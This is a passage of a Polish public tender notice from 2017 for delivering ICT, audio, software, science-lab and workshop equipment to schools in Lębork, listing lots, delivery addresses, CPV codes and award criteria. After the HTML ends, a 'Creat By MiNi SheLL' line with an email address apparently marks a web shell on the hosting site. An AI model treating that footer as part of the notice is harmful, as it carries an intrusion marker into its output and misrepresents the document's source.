              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Nie dopuszcza się jakichkolwiek zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Dostawcy z zastrzeżeniem postanowień ust. 2 niniejszego paragrafu. 
2.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	mającym wpływ na realizację umowy dotyczącym powszechnie obowiązujących przepisów prawa, 
b)	zmiany w nazwie, oznaczeniu, siedzibie Odbiorcy lub Dostawcy dokonanej w trakcie trwania umowy,
c)	zastąpienia przedmiotu umowy innym produktem o niegorszych parametrach niż oferowane w ofercie w przypadku wystąpienia sytuacji, gdy produkcja obecnego modelu zostanie zaprzestana i nie będzie on dostępny na rynku. Brak dostępności na rynku przedmiotu umowy oraz propozycję nowego, zamiennego produktu zgłasza Dostawca. Zmiana może zostać dokonana wyłącznie za zgodą Odbiorcy.
3.	Wszelkie zmiany postanowień niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 17/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK wizualizery, projektory multimedialne, urządzenia wielofunkcyjne, tablice multimedialne, routery, switche, aparaty i kamery cyfrowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>WIZUALIZER - 1 szt Adres dostawy:  Powiatowe Centrum Edukacyjne  Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork 
WIZUALIZER - 1 szt Adres dostawy:  Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork 
WIZUALIZER - 5 szt Adres dostawy:
- Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork-3 szt.
- Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-2 szt.
RZUTNIK MULTIMEDIALNY/PROJEKTOR Z UCHWYTEM DO ZAWIESZENIA GO NA SUFICIE 7 szt
Adres dostawy: 
-Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork  2 szt.
- Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork- 5 szt.
TABLICA MULTIMEDIALNA 2 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
URZĄDZENIE WIELOFUNKCYJNE 3 szt
Adres dostawy: 
-Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork  2 szt.
- Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork  1 szt.
URZĄDZENIE WIELOFUNKCYJNE 3 szt Adres dostawy: 
- Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork-2 szt.
- Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-1 szt.
URZĄDZENIE WIELOFUNKCYJNE 2 szt Adres dostawy: 
- Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork-1 szt.
- Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-1 szt.
URZĄDZENIE WIELOFUNKCYJNE 1 szt Adres dostawy:  Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
DRUKARKA 3D 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
ROUTER 7 szt Adres dostawy: 
- Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork-1 szt.
- Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-6 szt.
SWITCH 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
APARAT FOTOGRAFICZNY 3 szt Adres dostawy: 
- Powiatowe Centrum Edukacyjne  Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork  2 szt.
- Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork  1 szt.
APARAT FOTOGRAFICZNY 1 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
KAMERA CYFROWA 3 szt Adres dostawy: 
-Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork  1 szt.
-Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork  1 szt.
-Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-1 szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>32322000-6, 38652100-1,
                    30232000-4,
                    30230000-0,
                    38650000-6,
                    38651000-3,
                    38651600-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK  sprzęt sceniczny i nagłośnieniowy<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>PIANINO CYFROWE UMOŻLIWIAJĄCE NAGRYWANIE DŹWIĘKU 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
MIKROPORT BEZPRZEDWODOWY, MIKROFON NAGŁOWOWY 13 szt Adres dostawy:
- Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork-9 szt.
- Zespół Szkół Ogólnokształcących nr 1w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork-4 szt.
ZESTAW MIKROFONÓW BEZPRZEWODOWYCH (MIKROFON KRAWATOWY I NAGŁOWNY) 3 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
MIKROFON BEZPRZEWODOWY 2 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
REFLEKTOR OŚWIETLENIOWY 4 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
STOJAK-RAMPA OŚWIETLENIOWA 2 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
GŁOŚNIK BEZPRZEWODOWY 2 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
ZESTAW GŁOŚNIKÓW KOMPUTEROWYCH 3 zestawy Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
ZESTAW NAGŁAŚNIAJĄCY SALĘ 1 zestaw Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
SŁUCHAWKI Z MIKROFONEM 16 szt Adres dostawy:  Powiatowe Centrum Edukacyjne  Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>37300000-1, 32340000-8,
                    32351000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK  oprogramowanie komputerowe i przedmiotowe<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Oprogramowanie językowe   1 zestaw Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Oprogramowanie do nauki matematyki 3 zestawy Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Program do tworzenia stron www  2 zestawy Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Zestaw komputerowych programów logopedycznych 1 zestaw Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Oprogramowanie zabezpieczające komputer w przypadku kradzieży 30 zestawow Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Oprogramowanie zabezpieczające przed nieuzasadnionym korzystaniem z Internetu  11 zestawow Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Program do tworzenia stron www  8 zestawow Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Oprogramowanie do nauczania matematyki 2 szt Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork 
Oprogramowanie antywirusowe 1 szt Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork 
Oprogramowanie multimedialne do nauki języka obcego 2 szt Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
Oprogramowanie do zarządzania zestawem przenośnych komputerów 5 zestawow Adres dostawy: Powiatowe Centrum Edukacyjne  Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
Oprogramowanie zabezpieczające komputer w przypadku kradzieży 1 zestaw Adres dostawy: Powiatowe Centrum Edukacyjne  Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
Edytor testów i zadań 3 zestawy Adres dostawy: Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Zaawansowany program graficzny do obróbki grafiki 9 szt Adres dostawy: Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Oprogramowanie do nauczania jęz. angielskiego oraz interaktywny słownik polsko-angielski 2 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
Język obcy: Multimedialny podręcznik z zakresu konwersacji 1 szt Adres dostawy: Powiatowe Centrum Edukacyjne Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>48000000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK i wyposażenia pracowni szkolnych w narzędzia do nauczania przedmiotów przyrodniczych  biologia, chemia<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>BIOLOGIA - mikroskop szkolny 8 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
BIOLOGIA - mikroskop szkolny z kamerą 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
BIOLOGIA-wyposażenie pracowni ZSO 1 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
Model szkieletu człowieka 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Mikroskop z podłączeniem do komputera 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Mikroskop z podświetleniem LED 8 szt Adres dostawy:  Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Zestaw do wykonywania preparatów mikroskopowych 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
BIOLOGIA-wyposażenie pracowni ZSO 2 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Mikroskop z podłączeniem do komputera 1 szt Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
BIOLOGIA-wyposażenie pracowni PCE Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
Mikroskop z podłączeniem do komputera 1 szt Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
Model szkieletu człowieka 1 szt Adres dostawy:  Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
BIOLOGIA-wyposażenie pracowni ZSGŻiA-zestaw preparatów mikroskopowych 8 zestawow Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
BIOLOGIA, CHEMIA-wyposażenie pracowni ZSMI Adres dostawy:  Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
CHEMIA-wyposażenie pracowni ZSO 1 Adres dostawy:  Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
Dygestorium chemiczne 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
CHEMIA-wyposażenie pracowni ZSO 2 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Modele do budowania cząsteczek chemicznych 4 zestawy Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
CHEMIA-wyposażenie pracowni PCE Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>38000000-5, 24000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK i wyposażenia pracowni szkolnych w narzędzia do nauczania przedmiotów przyrodniczych  geografia, fizyka oraz pracowni matematycznych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Nawigacja satelitarna 2 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
Model Układu Słonecznego, tellurium 1 szt Adres dostawy:  Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
GEOGRAFIA  wyposażenie pracowni ZSO 1 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
Nawigacja satelitarna 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Model Układu Słonecznego, tellurium 1 szt Adres dostawy:  Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
GEOGRAFIA  wyposażenie pracowni ZSO 2 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Ogródek meteorologiczny lub automatyczna stacja meteorologiczna 1 szt Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
Model Układu Słonecznego, tellurium 1 szt Adres dostawy: Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
Nawigacja satelitarna 1 szt Adres dostawy: Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork
GEOGRAFIA  wyposażenie pracowni PCE Adres dostawy:  Powiatowe Centrum Edukacyjne - Zespół Szkół Ponadgimnazjalnych w Lęborku, ul. Pionierów 16, 84-300 Lębork 
Multimedialny geograficzny atlas świata 1 szt Adres dostawy:  Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
GEOGRAFIA  wyposażenie pracowni ZSGŻiA Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
FIZYKA- wyposażenie pracowni ZSO nr 1 Adres dostawy:  Zespół Szkół Ogólnokształcących Nr 1 w Lęborku, ul. Dygasińskiego 14, 84-300 Lębork
FIZYKA-wyposażenie pracowni ZSO nr 2 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Metalowa szafa na klucz 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Przybory magnetyczne ze wskaźnikami 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
MATEMATYKA-pozostałe wyposażenie pracowni ZSO nr 2 Adres dostawy: Zespół Szkół Ogólnokształcących Nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
MATEMATYKA - wyposażenie pracowni ZSGŻiA Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork
Przybory PCV magnetyczne ze wskaźnikami 1 zestaw Adres dostawy: Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork.
Kalkulator graficzny (przeznaczenie naukowe, inżynierskie) 8 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>38400000-9, 38100000-6,
                    39162000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Dostawa sprzętu TIK oraz innych niezbędnych materiałów i pomocy dydaktycznych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Maszyna wielofunkcyjna do obróbki drewna 1 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Stół z blatem ceramicznym 1 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Sztalugi malarskie 5 szt Adres dostawy: Specjalny Ośrodek Szkolno-Wychowawczy w Lęborku, ul. Reja 18, 84-300 Lębork
Zestaw do nauczania robotyki 4 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego14, 84-300 Lębork
Zestawy klasowe - mechanika Adres dostawy:  Zespół Szkół Mechaniczno-Informatycznych w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork
Pozostałe niezbędne wyposażenie ZSO nr 1 (Gilotyna, Flipchart, Statyw, Niszczarka, Głośniki, Zasilacz zabezpieczający komputer,) po 1 szt Adres dostawy: Zespół Szkół Ogólnokształcących nr 1 w Lęborku, ul. Dygasińskiego14, 84-300 Lębork
Flipchart szt 2 Adres dostawy: 
-Zespół Szkół Ogólnokształcących nr 2 w Lęborku, ul. Marcinkowskiego 1, 84-300 Lębork  1 szt.
-Zespół Szkół Gospodarki Żywnościowej i Agrobiznesu w Lęborku, ul. Warszawska 17, 84-300 Lębork  1 szt.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>32351000-8, 39162000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com